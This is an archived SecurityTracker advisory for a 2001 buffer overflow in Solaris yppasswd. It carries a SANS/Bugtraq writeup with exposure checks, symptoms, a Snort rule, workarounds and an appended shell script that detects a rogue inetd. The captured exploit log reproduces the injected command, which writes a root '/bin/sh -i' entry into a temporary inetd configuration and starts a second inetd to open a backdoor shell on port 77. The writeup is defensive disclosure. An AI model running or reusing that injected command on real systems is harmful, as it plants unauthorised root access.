SecurityTracker.com
Category:   Application (Generic)  >   Yppasswd
Vendors:   Sun
Yppasswd on Sun Solaris Gives Remote Users Root-Level Access on the Server
SecurityTracker Alert ID:  1001631
SecurityTracker URL:  http://securitytracker.com/id/1001631
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  May 29 2001
Impact:   Execution of arbitrary code via network, Root access via network

Version(s): Solaris 6, 7 (SPARC tested, x86 unknown)
Description:   It is reported that the yppasswd service on Sun Solaris contains a vulnerability that allows a remote user to obtain root-level access on the server.

It is reported that a buffer overflow exists in yppasswd on certain versions of Sun Solaris. A working exploit has been circulating (but is not included in this report).

It is reported that users can check a system for the vulnerability using "rpcinfo -p | grep 100009" or "ps -ef | grep yppassword". If either of these commands returns some information, then the system is reportedly vulnerable to the exploit.

Some additional information about the symptoms of a successful exploit is provided in the Source Message.

Impact:   A remote user can obtain root-level access on the server.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.sun.com/
Cause:   Boundary error
Underlying OS:   UNIX (Solaris - SunOS)

Message History:   This archive entry has one or more follow-up message(s) listed below.
(Additional Information) Re: Yppasswd on Sun Solaris Gives Remote Users Root-Level Access on the Server   (Matt Power <mhpower@bos.bindview.com>)
Some additional information is provided.
(Sun Issues Fix) Re: Yppasswd on Sun Solaris Gives Remote Users Root-Level Access on the Server   (David Foster <foster@dim.ucsd.edu>)
Sun has released a fix.
(Sun Issues Fix) Yppasswd on Sun Solaris Gives Remote Users Root-Level Access on the Server   (secure@sunsc.eng.sun.com)
The vendor has released a fix.
(Caldera Issues Fix for OpenServer) Yppasswd on Sun Solaris Gives Remote Users Root-Level Access on the Server   (security@caldera.com)
Caldera has issued a fix for OpenServer.



 Source Message Contents

Date:  Mon, 28 May 2001 14:14:23 -0400 (EDT)
Subject:  solaris 2.6, 7 yppasswd vulnerability



aleph,

please pass this on to bugtraq. this is *not* a crimelabs find, only some
information i haven't yet seen on bugtraq. this is culled from the
writeups by myself and matt fearnow (and is available on the incidents.org
website http://www.incidents.org/news/yppassword.php).

thanks.

____________________________
jose nazario						     jose@cwru.edu
	      	     PGP: 89 B0 81 DA 5B FD 7E 00  99 C3 B2 CD 48 A0 07 80
				       PGP key ID 0xFD37F4E5 (pgp.mit.edu)




                        Vulnerability Report

        Vulnerability: Buffer overflow in yppasswd service
              Affects: Solaris 6, 7 (SPARC tested, x86 unknown)
              Exploit: In circulation (http://www.hack.co.za/)
         Vendor Patch: Not yet.
                       Various people have contacted Sun about this. No
                       official word yet.
                       Workarounds supplied (included).
              Credits: 'metaray'
     Acknowledgements: Hackernews for heads up
                       Stephen Lee <lee@mailhost.sju.edu>
                       Melanie Humphrey <melanie@mathcs.sjsu.edu>
                       Neil Long <neil.long@computing-services.oxford.ac.uk>
                       Matt Fearnow (SANS)

Description

Please note that this is a preliminary characterization of the Solaris
yppassword buffer overflow. This version is available to provide at least
some information about it. Please check back over the next few days as the
information is made more complete.

A buffer overflow exploit (for the SPARC architecture) has been found in
the wild which takes advantage of an unchecked buffer in the 'yppasswd'
service on Solaris 2.6, 7 machines. The Intel/x86 version of Solaris 2.6
and 7 may be vulnerable but has not yet been tested.

To check your system for vulnerability, use "rpcinfo -p | grep 100009" or
you can use "ps -ef | grep yppassword". If you see something, your system
is vulnerable to this exploit.

Exploit log message:

May  9 13:56:56 victim-system yppasswdd[191]: yppasswdd: user
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@L
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@P"
`"?-"?-"?-"? ; /bin/sh-c echo 'rje stream tcp nowait root /bin/sh sh
-i'>z;/usr/sbin/inetd -s z;rm z;: does not exist


Symptoms: two inetds running:

victim-system:# ps -ef | grep inetd
root   209     1  0   Apr 30 ?        0:18 /usr/sbin/inetd -s -t
root  8297     1  0 13:56:56 ?        0:00 /usr/sbin/inetd -s z


Effect: root shell on port 77/TCP

she-ra:$ telnet victim-system rje
Trying 192.168.10.5...
Connected to victim-system.example.com.
Escape character is '^]'.
#

Detection

While running the code against a "non vulnerable" Solaris system,
Snort picks up the following:

May 10 20:52:33 macew snort[30824]: IDS19/portmap-request-amountd:
192.168.4.38:654 -> 192.168.12.30:111

May 10 20:52:33 macew snort[30824]: IDS19/portmap-request-amountd:
192.168.4.38:654 -> 192.168.12.30:111

May 10 20:52:33 macew snort[30824]: IDS19/portmap-request-amountd:
192.168.4.38:654 -> 192.168.12.30:111

The following is the snort rule from whitehats, that picked this up:

alert UDP $EXTERNAL any -> $INTERNAL 111 (msg: 
"IDS19/portmap-request-autofsd"; rpc: 10099,*,*;)

Protection

The best solution is to firewall your box(es) that are running NIS from
the internet. However this will not stop the insider attack.

Sun has not released an official patch for this yet. A workaround 1) would
be to turn off yppasswdd. This is around line 133 or so in
/usr/lib/netsvc/yp/ypstart. Just comment it out. The hack doesn't appear
to work if yppassword is disabled with NIS still running. Please note in
doing this, yppassword is not running and users cannot change their
password.

Another workaround 2), if you still need to run yppassword, is to do
the following:

set noexec_user_stack = 1
set noexec_user_stack_log = 1
in /etc/system (after a reboot of course)

Of course a different exploit could work around that but hopefully this
will permit people to use yppasswd until a patch is forthcoming. This step
has not been tested yet.

References

Further information can be found at:
* http://www.incidents.org
* http://www.sans.org/infosecFAQ/unix/NIS.htm, Security Issues in NIS
* http://www.sans.org/infosecFAQ/unix/sec_solaris.htm Securing Solaris

Credits

This security advisory was prepared by Matt Fearnow of the SANS Institute
and Jose Nazario.

Also contributing efforts go to Melanie Humphrey for the 1) workaround and
Neil Long for the 2) workaround and to Stephen Lee. Acknowledgements:
Hackernews for heads up, and 'metaray' for discovering this vulnerability.
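
The exposure check, the "two inetds" symptom and the /etc/system workaround
from the message above, written as shell functions that can be run against
saved command output. This is an added example, not part of the original
advisory or its authors' tooling. Assumptions: the rpcinfo sample lines are
constructed, /etc/inetd.conf is taken as the only expected inetd
configuration file, and "*" is treated as the /etc/system comment character.

```shell
#!/bin/sh
# Added example: offline-testable versions of the advisory's checks.
# Each function reads command output on stdin; on a live host feed it
# `rpcinfo -p`, `ps -ef` or /etc/system instead of the samples below.

# True if RPC program 100009 (yppasswdd) is registered. Compares the
# program-number column exactly instead of grepping for a substring.
yppasswdd_registered() {
    awk '$1 == "100009" { hit = 1 } END { exit !hit }'
}

# Print PIDs of inetd processes given a config file other than
# /etc/inetd.conf (the symptom above is a second "inetd -s z").
# The command column is located by scanning, because STIME may be
# one field ("13:56:56") or two ("Apr 30").
rogue_inetd_pids() {
    awk '{
        c = 0
        for (i = 1; i <= NF; i++)
            if ($i == "inetd" || $i ~ /\/inetd$/) { c = i; break }
        if (!c) next
        for (i = c + 1; i <= NF; i++)
            if ($i !~ /^-/ && $i != "/etc/inetd.conf") { print $2; break }
    }'
}

# True if /etc/system content sets noexec_user_stack to 1.
# Lines beginning with "*" are treated as comments (assumption noted above).
noexec_stack_enabled() {
    awk '/^[ \t]*\*/ { next }
         { gsub(/[ \t]+/, " "); sub(/ ?= ?/, "=") }
         $1 == "set" && $2 == "noexec_user_stack=1" { ok = 1 }
         END { exit !ok }'
}

# Sample input: rpcinfo lines are constructed; the ps lines are the two
# from the advisory plus a constructed line for the grep process itself.
SAMPLE_RPCINFO='   program vers proto   port  service
    100000    4   udp    111  rpcbind
    100009    1   udp  32778  yppasswdd'
SAMPLE_PS='root   209     1  0   Apr 30 ?        0:18 /usr/sbin/inetd -s -t
root  8297     1  0 13:56:56 ?        0:00 /usr/sbin/inetd -s z
root  8301  8290  0 13:58:02 pts/1    0:00 grep inetd'

printf '%s\n' "$SAMPLE_RPCINFO" | yppasswdd_registered && echo "100009 registered"
echo "suspect inetd PIDs: $(printf '%s\n' "$SAMPLE_PS" | rogue_inetd_pids)"
```

The process check is done on the command column rather than with a bare
grep, since "ps -ef | grep <name>" always lists the grep process itself.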









Copyright 2013, SecurityGlobal.net LLC